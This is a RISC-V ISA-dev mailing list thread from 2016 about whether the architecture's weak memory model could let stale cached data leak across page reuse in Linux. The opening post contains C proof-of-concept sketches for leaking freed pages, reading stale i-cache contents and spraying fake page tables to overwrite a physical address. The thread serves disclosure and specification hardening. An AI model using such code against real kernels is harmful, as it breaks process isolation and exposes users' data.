Possible implications of the weak RISC-V memory model for security on Linux and other kernels?

524 views
Skip to first unread message

Stefan O'Rear

unread,
Aug 13, 2016, 3:08:13 AM8/13/16
to isa...@groups.riscv.org
Is it generally known that RISC-V's memory model is weaker than anything in
current wide use with Linux, and is at a high level the same as Alpha, as it
permits reordering of dependent reads?

Thinking about the behavior of allocation-time page zeroing in an environment
with caches that reorder dependent reads, I have the impression that the current
RISC-V Linux port is not quite doing enough to prevent reordered memory accesses
from exposing the contents of freed pages. I am not sure if this impression is
accurate, so I'd like some more opinions on this. This message is written from
the perspective of Linux but I think it is applicable to any kernel which
implements page-based virtual memory shared between mutually untrusting users.

POSIX expects any page allocated to a process to be filled with zeros; this can
be done at free time, at allocate time, or anywhere in between. Linux zeros at
allocation; since the zeroing is done in thread context the calling thread is
guaranteed to not see the page's old data in any reasonable memory model.
However, if *another* thread in the same process immediately attempts to read
the newly allocated thread, the memory model and the kernel must collaborate to
avoid exposing data from the page's previous owner.

Since a zeroed page's address only becomes visible to other threads after being
written into the page table, I think address dependency barriers as implemented
by ARM and PowerPC (side note: does anyone have a reference for how these are
actually implemented?) are sufficient to prevent visibility of freed data, if
the allocating thread executes a write barrier between zeroing and creating the
PTE (which Linux does).

As RISC-V does not guarantee ordering with address dependency, it appears that a
kernel which wants to run on arbitrary RISC-V implementations must proactively
shoot down stale cached data, by doing an inter-processor interrupt with the
effect of a `fence r,rw; fence.i; sfence.vm x0` after any time pages are zeroed.
Linux does not do this (including on Alpha, which would theoretically also
require it?), leading to three anomalies discussed below *if* the the CPU
reorders memory aggressively enough.

(If this is correct, then the question becomes how to minimize the cost of the
shootdown. For now I'm more interested in "if" though.)

## On page zeroing

```
volatile char bss[1 << 28];
volatile int faulted;

void thread_a() {
for (int poke = 0; poke < sizeof(bss); poke += 4096) {
bss[poke] = 1;
faulted = poke;
}
}

void thread_b() {
while (1) {
char read = bss[faulted + 2048];
assert(read == 0);
}
}

void victim() {
while (1) {
char* page = mmap(0, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
page[2048] = 1;
munmap(page, 4096);
}
}
```

This is the easiest case to exploit but also the easiest to mitigate, as
`fence r,rw` suffices.

Thread A repeatedly allocates pages (Linux does page allocation on first write,
other kernels do allocation at different times but the code can be adapted).
Each time `faulted` is updated, thread B eventually learns this, but since there
are no fence instructions here, the subsequent read in thread B might return
arbitrarily stale data.

Thread B does two significant reads; one of the page table to get the newly
allocated page, and one for the data of the new page. If the first read sees the
new page, but the second read returns stale data from a cache, this can leak
data from the victim thread (which could be another process running with another
user ID) to thread B.

## Hiding in the i-cache

This is trickier because it requires the victim's pages to contain something
resembling valid instructions, and since realistic implementations will not
speculatively load random lines into I$ the victim must also have executed the
code; that makes this less useful for general exfiltration, but could be
theoretically be used against JITs or as a covert channel. On the other hand it
is much more expensive to mitigate because of the requirement for an i-cache
shootdown.

W^X complicates this if enabled in the kernel. I suspect it can be worked
around but haven't worked out the details. Also, there's potential for a lot of
weirdness here if a page with unexpected content is mapped.

```
volatile char bss[1 << 28];
volatile int faulted;

void thread_a() {
mprotect(bss, sizeof(bss), PROT_READ|PROT_WRITE|PROT_EXEC);
/* allocate pages and signal to thread B without fences */
for (int poke = 0; poke < sizeof(bss); poke += 4096) {
bss[poke] = 1;
faulted = poke;
}
}

volatile jmp_buf onill;
void illhand(int signo) {
longjmp(onill, 1);
}

void thread_b() {
mprotect(bss, sizeof(bss), PROT_READ|PROT_WRITE|PROT_EXEC);
/* we need to recover from invalid instruction faults */
struct sigaction sa;
sa.sa_handler = illhand;
sa.sa_mask = 0;
sa.sa_flags = 0;
sigaction(SIGILL, &sa, 0);

while (1) {
if (!setjmp(onill)) {
int secret = ((int(*)())(bss + faulted + 2048))();
assert(0);
}
/* if the victim line wasn't resident in i-cache, we'll
most likely execute 0 and trap SIGILL, try again */
/* or, we just jumped into a dirty page from something
other than the designated victim, and execution is
now entirely off the rails. */
}
}

void victim() {
while (1) {
char* page = mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
/* addi x10, x0, 42; jalr x0, 0(x1) */
memcpy(page+2048, "\x13\x05\xa0\x02" "\x67\x80\x00\x00", 8);
((int(*)())(page+2048))();
/* our secret data is now in I$ */
munmap(page, 4096);
}
}
```

## sfence.vm and overwriting physical memory

This is a special case where the stale memory view is the TLB. On plausible
implementations (TLB is loaded from D$ and only for page table walking, no
other reason), this can be mitigated with an interprocessor `fetch r,rw`. In
the most general case allowed by the RISC-V spec, interprocessor `sfence.vm` is
required here, but since page table allocation is much rarer than page
allocation that might be fine.

We're not going to do exfiltration here; if we can get the receiver thread to
treat stale user-mode data as a page table, then we can be much more ambitious
and try to write arbitrary physical memory.

```
/* attack parameters */
const uintptr_t attack_address = 0x8000000;
/* assumes old value at this address is non-zero */
const uintptr_t new_value = 42;

void thread_a() {
/* spray memory with fake page tables */
while (1) {
uintptr_t* page = mmap(0, 4096, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
for (int i = 0; i < 4096 / sizeof(uintptr_t); i++) {
page[i] = attack_address | 0xFF; /* DAGURWXV */
}
munmap(page, 4096);
}
}

volatile uintptr_t* volatile vaddr;
void thread_b() {
/* allocate fresh page tables */
while (1) {
vaddr = mmap(0, 4096*(4096/sizeof(uintptr_t)), PROT_READ,
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
int get = *vaddr; /* allocates page table, writes to PMD */
}
}

void thread_c() {
while (1) {
/* we have learned through a data race on the PMD an address for a
freshly allocated and zeroed page table. except that any given
PTE might be stale data written by thread_a. */
if (vaddr != 0 && *vaddr != 0) {
/* oops. we can only get here if we just read a mapping
into the TLB from one of the fake page tables;
*vaddr aliases attack_address, and we're assuming the
legitimate value was non-zero */
*vaddr = new_value;
assert(0);
}
}
}
```

Michael Clark

unread,
Aug 14, 2016, 1:53:23 AM8/14/16
to Stefan O'Rear, isa...@groups.riscv.org
Hi Stefan, All,

The points you raise are really very interesting, especially for the out of order RISC-V implementations. A cache-coherent single issue in-order unit may pass these tests while not actually representing the formal model of RISC-V which as you mentioned is relaxed. 

The specification seems clear that no ordering is guaranteed between threads without an explicit fence, so I can see your sample code forming the basis of a cache coherency test. It would be quite neat to have an aggressively out of order implementation that these test fails on, and pass with the correct fence instructions.

On 13 Aug 2016, at 7:08 PM, Stefan O'Rear <sor...@gmail.com> wrote:

As RISC-V does not guarantee ordering with address dependency, it appears that a
kernel which wants to run on arbitrary RISC-V implementations must proactively
shoot down stale cached data, by doing an inter-processor interrupt with the
effect of a `fence r,rw; fence.i; sfence.vm x0` after any time pages are zeroed.
Linux does not do this (including on Alpha, which would theoretically also
require it?), leading to three anomalies discussed below *if* the the CPU
reorders memory aggressively enough.

However I have a much more mundane question for the ISA developers.

The `fence` and `sfence.vm` instructions are currently defined in the ISA spec as respectively taking 0b1111_1111 and x0 as operands.

Thus fence is currently specified as a conservative full IO and memory barrier:

  fence iorw,iorw

However I have a minor issue with the specification in that the assembly operand order has not always been clear. For example, rd is on the left in the assembler notation and on the right in the instruction format table (by nature of the position of the fields within the bit encoding). Also the assembly operands have been removed from the table beginning on Page 54 of the latest version of the ISA spec.

I have typically read the simulator source to clarify operand order, however in this case these two instructions don’t currently take any operands.

So am I reading the fence instruction correctly as?

  fence <succ>,<pred>

Such that `fence r,rw` means no successive reads can be observed until all previous reads and writes before the fence have completed.

The reason I raise it, as there is an ISA metadata tool that is raising two warnings on a variant of the Base ISA opcodes file, and the operand order is currently pred succ (the left to right bit encoding from the spec):

WARNING: codec deduction failure: fence                 codec_key: pred·succ
WARNING: codec deduction failure: sfence.vm             codec_key: rs1

If someone can clarify I could fix these two metadata warnings and use x0 in the disassembler for sfence.vm.

Regards,
Michael.

Andrew Waterman

unread,
Aug 19, 2016, 4:09:07 PM8/19/16
to Michael Clark, Stefan O'Rear, RISC-V ISA Dev
It is the other way around (i.e., fence pred, succ). I don't think
the assembly syntax for FENCE is ever explicitly stated in the ISA
manual, but in the atomics chapter commentary there is a consistent
code example.

>
> The reason I raise it, as there is an ISA metadata tool that is raising two
> warnings on a variant of the Base ISA opcodes file, and the operand order is
> currently pred succ (the left to right bit encoding from the spec):
>
> WARNING: codec deduction failure: fence codec_key: pred·succ
> WARNING: codec deduction failure: sfence.vm codec_key: rs1
>
> If someone can clarify I could fix these two metadata warnings and use x0 in
> the disassembler for sfence.vm.
>
> Regards,
> Michael.
>
> --
> You received this message because you are subscribed to the Google Groups
> "RISC-V ISA Dev" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to isa-dev+u...@groups.riscv.org.
> To post to this group, send email to isa...@groups.riscv.org.
> Visit this group at
> https://groups.google.com/a/groups.riscv.org/group/isa-dev/.
> To view this discussion on the web visit
> https://groups.google.com/a/groups.riscv.org/d/msgid/isa-dev/5048F282-6425-4906-9805-7299FCCF3FE4%40mac.com.

Andrew Waterman

unread,
Aug 20, 2016, 3:03:18 AM8/20/16
to Stefan O'Rear, RISC-V ISA Dev
Pardon the terse response to an important topic.

The RISC-V memory model is underspecified. Ongoing efforts aim to
tighten it up.

It's hard to discuss these specific cases without an operational model
of RISC-V harts, but I expect such a model will ultimately stipulate
that RAW hazards between instructions imply the corresponding memory
ordering constraints you'd expect.
> --
> You received this message because you are subscribed to the Google Groups "RISC-V ISA Dev" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to isa-dev+u...@groups.riscv.org.
> To post to this group, send email to isa...@groups.riscv.org.
> Visit this group at https://groups.google.com/a/groups.riscv.org/group/isa-dev/.
> To view this discussion on the web visit https://groups.google.com/a/groups.riscv.org/d/msgid/isa-dev/CADJ6UvO1Tw1f7rQKJZoBbXhshVbxtSjGV3FdR1JJLtYyVO_9Ww%40mail.gmail.com.

Stefan O'Rear

unread,
Aug 20, 2016, 3:39:59 AM8/20/16
to Andrew Waterman, RISC-V ISA Dev
On Sat, Aug 20, 2016 at 12:02 AM, Andrew Waterman <and...@sifive.com> wrote:
> Pardon the terse response to an important topic.
>
> The RISC-V memory model is underspecified. Ongoing efforts aim to
> tighten it up.
>
> It's hard to discuss these specific cases without an operational model
> of RISC-V harts, but I expect such a model will ultimately stipulate
> that RAW hazards between instructions imply the corresponding memory
> ordering constraints you'd expect.

Thank you.

"RAW hazards" sounds like it's describing an ARM/PowerPC-style
"address dependency" system, which would also be relevant for the
ongoing work to formalize memory_order_consume in the C and C++ WGs.
I'll be quite interested to see the results of this when they are
ready.

-s

Andrew Waterman

unread,
Aug 20, 2016, 5:13:57 AM8/20/16
to Stefan O'Rear, RISC-V ISA Dev
Yes, something along those lines (though hopefully easier to digest,
in the end).

>
> -s

Andrew Lutomirski

unread,
Oct 5, 2016, 11:33:06 AM10/5/16
to RISC-V ISA Dev
I may be biased by my x86 experience, but I think the problem is worse than your post suggests.


On Saturday, August 13, 2016 at 12:08:13 AM UTC-7, sorear2 wrote:

Since a zeroed page's address only becomes visible to other threads after being
written into the page table

I don't think that the zeroed page's address' visibility is relevant, unfortunately.

CPU A:

 - call mmap()
   - zero a page.
   - fence?
   - write a PTE.

CPU B:

 - Access the page.

CPU B has a decent chance of getting an exception, but suppose it gets lucky and waits long enough before reading the page that it doesn't get an exception.  What does it see?  What TLB entry is created?

I think that CPU A is going to need that fence (as a w,w fence) regardless of what the final RISC-V memory model says, but there are no relevant fence instructions or explicit dependencies at all on CPU B to synchronize with it.  Unless I'm missing something (and I have no idea how Alpha deals with it), there are only two ways to make this safe.  Either CPU A needs to send an IPI before writing a PTE (please, please don't do that.  TLB flush IPIs are bad enough (and RISC-V should consider following ARM64's lead and adding a non-IPI way to handle this), but TLB population IPIs would be far worse), or the CPU should implicitly order all accesses involved in TLB fills.  That is, reads of higher-level paging structures should be ordered before reads of lower-level paging structures, and reads of the final PTE should be ordered before any reads or writes that use the TLB entry that gets filled.

I don't think there's any need to order the first read involved in the TLB fill with anything prior -- even x86 permits fully speculative TLB fills, and I don't think it's ever caused a problem. *

* Maybe it has.  CPU A could create a cacheable mapping of memory that can't be safely cached and then destroy the mapping without accessing it at all.  CPU B could, in theory, speculatively load the translation and fetch the cache line.  Boom.  I've never heard of this happening.  On the other hand, I haven't been involved in this stuff when old enough CPUs that had fragile enough cache coherency schemes to care were still common.

 

Stefan O'Rear

unread,
Oct 8, 2016, 12:32:28 AM10/8/16
to Andrew Lutomirski, RISC-V ISA Dev
On Wed, Oct 5, 2016 at 8:33 AM, Andrew Lutomirski <aml...@gmail.com> wrote:
> CPU B has a decent chance of getting an exception, but suppose it gets lucky
> and waits long enough before reading the page that it doesn't get an
> exception. What does it see? What TLB entry is created?

I didn't mention this, but I already said you need page table
population IPIs, and if you're doing that you might as well also have
population IPIs for PGD, PMD, PUD which handles this. Yucky, but with
the "RAW dependencies" change I've mentioned a couple times today it
goes away.

> I think that CPU A is going to need that fence (as a w,w fence) regardless
> of what the final RISC-V memory model says, but there are no relevant fence
> instructions or explicit dependencies at all on CPU B to synchronize with
> it. Unless I'm missing something (and I have no idea how Alpha deals with
> it), there are only two ways to make this safe. Either CPU A needs to send

There's a comment in the kernel source which implies that the TLB fill
PALcode on Alpha contains the necessary acquire fences.

> an IPI before writing a PTE (please, please don't do that. TLB flush IPIs
> are bad enough (and RISC-V should consider following ARM64's lead and adding
> a non-IPI way to handle this), but TLB population IPIs would be far worse),
> or the CPU should implicitly order all accesses involved in TLB fills. That
> is, reads of higher-level paging structures should be ordered before reads
> of lower-level paging structures, and reads of the final PTE should be
> ordered before any reads or writes that use the TLB entry that gets filled.

The page table walk is an address dependency chain so it falls out of
the address dependency change. Would be good to be explicit in the
documentation of course.

> I don't think there's any need to order the first read involved in the TLB
> fill with anything prior -- even x86 permits fully speculative TLB fills,
> and I don't think it's ever caused a problem. *

Here's one way it could break: a single-threaded process on hart A
maps a file, unmaps it and maps something else (Linux elides TLB
shootdown on munmap for single-threaded processes, right?), gets put
to sleep and then migrated to another hart B. If hart B is allowed to
speculatively fill TLBs with no constraints whatsoever, then hart B
might have a stale copy of the process' first mapping, despite never
having seen the SPTBR value before. I think this might be addressable
by forcing SFENCE.VM the first time a given hart schedules a given
process, though.

Speculative instruction caching is potentially worse; a programmer
might assume you can allocate a zeroed page, write instructions into
it, and jump, but the processor is allowed to speculatively cache the
zeros in the page and trap an illegal instruction on the jump if you
don't include a FENCE.I. You can't even fix this up in a SIGILL
handler because you might be using the C extension, and misaligned
32-bit instructions are not fetched atomically so you might wind up
with _half_ of an instruction speculatively cached as zero, which
won't always make it invalid.

Also, the kernel needs to do a global FENCE.I shootdown when it zeros
a page, just in case the page's previous owner wrote sensitive
instructions in it. On Rocket FENCE.I is implemented by throwing out
the entire 32KB first-level I-cache; I think that could get expensive
to do for every hart once per clear_page but I don't feel my intuition
is reliable here.

-s

Jacob Bachmeyer

unread,
Oct 9, 2016, 11:14:52 PM10/9/16
to Stefan O'Rear, Andrew Lutomirski, RISC-V ISA Dev
Stefan O'Rear wrote:
> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
> a page, just in case the page's previous owner wrote sensitive
> instructions in it. On Rocket FENCE.I is implemented by throwing out
> the entire 32KB first-level I-cache; I think that could get expensive
> to do for every hart once per clear_page but I don't feel my intuition
> is reliable here.
>

Why would this be needed? FENCE.I only ensures that instruction fetch
will see data stores; there is no way to read the I-cache into registers
or write its contents to data memory. Further, if the mapping was not
executable, then the page cannot be in the I-cache at all. So at least
data pages will not need this.

How can "sensitive instructions" even exist? What are "sensitive
instructions"? How could this lead to an exploit with any more chance
of success than accessing a supervisor address over and over and hoping
for a bit-error loading the TLB?

-- Jacob

Stefan O'Rear

unread,
Oct 9, 2016, 11:31:29 PM10/9/16
to Jacob Bachmeyer, Andrew Lutomirski, RISC-V ISA Dev
On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
> Stefan O'Rear wrote:
>>
>> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
>> a page, just in case the page's previous owner wrote sensitive
>> instructions in it. On Rocket FENCE.I is implemented by throwing out
>> the entire 32KB first-level I-cache; I think that could get expensive
>> to do for every hart once per clear_page but I don't feel my intuition
>> is reliable here.
>>
>
>
> Why would this be needed? FENCE.I only ensures that instruction fetch will
> see data stores; there is no way to read the I-cache into registers or write
> its contents to data memory.

You can read the contents of the I-cache by jumping into it and getting lucky.

> Further, if the mapping was not executable,
> then the page cannot be in the I-cache at all. So at least data pages will
> not need this.

This is "common sense", which is not the same as "actually specified".
The spec does not forbid an implementation from doing speculative
I-cache loads against X=0 pages and later using the stale cached data
after an X=1 PTE is loaded. X bit is only required to check at
execute time, not load-from-RAM time.

My current favorite example of what can elude even relatively mature
memory models is the "out-of-thin-air problem",
https://isocpp.org/files/papers/N3710.html . This stuff is slippery
in a way that very few things are outside of
foundations-of-mathematics.

>
> How can "sensitive instructions" even exist? What are "sensitive
> instructions"?

Bit patterns which, when executed as instructions by some process,
reveal information to that process.

> How could this lead to an exploit with any more chance of
> success than accessing a supervisor address over and over and hoping for a
> bit-error loading the TLB?

Never bet against the creativity of exploit authors. I have seen
"hoping for a bit error" turned into a working exploit.

-s

Andrew Lutomirski

unread,
Oct 10, 2016, 12:09:59 AM10/10/16
to Stefan O'Rear, Jacob Bachmeyer, RISC-V ISA Dev

On Oct 9, 2016 8:31 PM, "Stefan O'Rear" <sor...@gmail.com> wrote:
>
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:

> > Further, if the mapping was not executable,
> > then the page cannot be in the I-cache at all.  So at least data pages will
> > not need this.
>
> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded.  X bit is only required to check at
> execute time, not load-from-RAM time.
>

It's a little worse.  Suppose I map a page X, then execute from it, then unmap it, change the contents, and map it again.  The CPU has to notice the new contents somehow.

This isn't even just an exploit issue.  This could go wrong entirely by accident.

Stefan O'Rear

unread,
Oct 10, 2016, 12:30:44 AM10/10/16
to Andrew Lutomirski, Jacob Bachmeyer, RISC-V ISA Dev
I think this is why the kernel flushes the icache on [most PTE populations][1].

[1] https://github.com/torvalds/linux/blob/24532f768/mm/memory.c#L3030

The RISC-V port seems to be using the asm-generic definition of
flush_icache_page, which is a no-op macro. I can't say with certainty
that's wrong, but it seems weird.

It occurs to me fence.i can be deferred from page zeroing until the
first time a page is mapped X=1; as long as the page is X=0 stale data
in the i-cache is unobservable.

(Do implementations correctly handle misaligned instructions extending
from an X=1 page into an X=0 page?)

We may wind up with a world where most high-performance
implementations have coherent I-caches. Unclear.

-s

Alex Elsayed

unread,
Oct 10, 2016, 6:44:11 AM10/10/16
to isa...@groups.riscv.org
On Sunday, 9 October 2016 20:31:26 PDT Stefan O'Rear wrote:
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
> > Stefan O'Rear wrote:

<snip>

> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded. X bit is only required to check at
> execute time, not load-from-RAM time.
>
> My current favorite example of what can elude even relatively mature
> memory models is the "out-of-thin-air problem",
> https://isocpp.org/files/papers/N3710.html . This stuff is slippery
> in a way that very few things are outside of
> foundations-of-mathematics.

You may find this recent work interesting, on that note:

http://sf.snu.ac.kr/promise-concurrency/

A set of slides that summarize it nicely:

http://www.mpi-sws.org/~dreyer/talks/talk-wg28-2016.pdf

<snip>


Jacob Bachmeyer

unread,
Oct 10, 2016, 6:46:30 PM10/10/16
to Stefan O'Rear, Andrew Lutomirski, RISC-V ISA Dev
Stefan O'Rear wrote:
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
>
>> Stefan O'Rear wrote:
>>
>>> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
>>> a page, just in case the page's previous owner wrote sensitive
>>> instructions in it. On Rocket FENCE.I is implemented by throwing out
>>> the entire 32KB first-level I-cache; I think that could get expensive
>>> to do for every hart once per clear_page but I don't feel my intuition
>>> is reliable here.
>>>
>> Why would this be needed? FENCE.I only ensures that instruction fetch will
>> see data stores; there is no way to read the I-cache into registers or write
>> its contents to data memory.
>>
>
> You can read the contents of the I-cache by jumping into it and getting lucky.
>

The "getting lucky" part is what I would expect to be incredibly
unlikely. Then again, I thought Rowhammer "would never happen" until it
did.

>> Further, if the mapping was not executable,
>> then the page cannot be in the I-cache at all. So at least data pages will
>> not need this.
>>
>
> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded. X bit is only required to check at
> execute time, not load-from-RAM time.
>

Then perhaps the spec should be changed to require speculative loads
that would cause an access fault if used to be immediately discarded?
Or to require that a speculative load be aborted immediately with no
effect on any potentially-visible state if a fault is detected?

Filling an I-cache line must first resolve a PTE to get a physical
address. A speculative cacheline fill should be silently aborted if the
TLB reports an access fault. A non-speculative fill, of course, traps
on an access fault.

Another, more general wording: Any speculative operation that would
trap if it were non-speculative must be canceled in such a way that it
leaves no effect.

In other words, we should "actually specify" the "common sense" in this
case. :)

> My current favorite example of what can elude even relatively mature
> memory models is the "out-of-thin-air problem",
> https://isocpp.org/files/papers/N3710.html . This stuff is slippery
> in a way that very few things are outside of
> foundations-of-mathematics.
>

This is why I think that tightening the spec is wise when edge cases
like this are found.

>> How can "sensitive instructions" even exist? What are "sensitive
>> instructions"?
>>
>
> Bit patterns which, when executed as instructions by some process,
> reveal information to that process.
>

Fair enough,

>> How could this lead to an exploit with any more chance of
>> success than accessing a supervisor address over and over and hoping for a
>> bit-error loading the TLB?
>>
>
> Never bet against the creativity of exploit authors. I have seen
> "hoping for a bit error" turned into a working exploit

Rowhammer works by *causing* bit errors. Is there really something so
laughably unreliable out there that *sitting* *back* *and* *waiting*
leads to exploitable errors, consistently?


-- Jacob
Reply all
Reply to author
Forward
0 new messages